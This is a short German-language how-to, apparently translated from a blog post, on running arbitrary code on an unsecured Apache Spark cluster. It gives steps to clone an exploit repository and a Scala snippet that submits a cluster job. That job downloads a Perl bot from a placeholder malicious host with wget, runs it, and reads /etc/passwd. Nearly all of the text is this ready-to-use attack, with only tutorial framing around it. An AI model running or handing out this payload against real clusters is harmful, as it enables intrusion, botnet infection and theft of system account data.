
Beliebige Codeausführung in einem ungesicherten Apache-Spark-Cluster
Befolgen Sie die folgenden Schritte:
* $ git clone https://github.com/akhld/spark-exploit.git
* $ cd spark-exploit
Öffnen Sie exploit.scala und ersetzen Sie den folgenden Code durch das, was Sie ausführen möchten!
val exploit = sc.parallelize(1 to 1).map(x=>{
//Replace these with whatever you want to get executed
val x = "wget https://mallicioushost/mal.pl -O bot.pl".!
val y = "perl bot.pl".!
scala.io.Source.fromFile("/etc/passwd").mkString
})
https://hacked.work/blog/arbitary-code-execution-in-unsecured-apache-spark-cluster/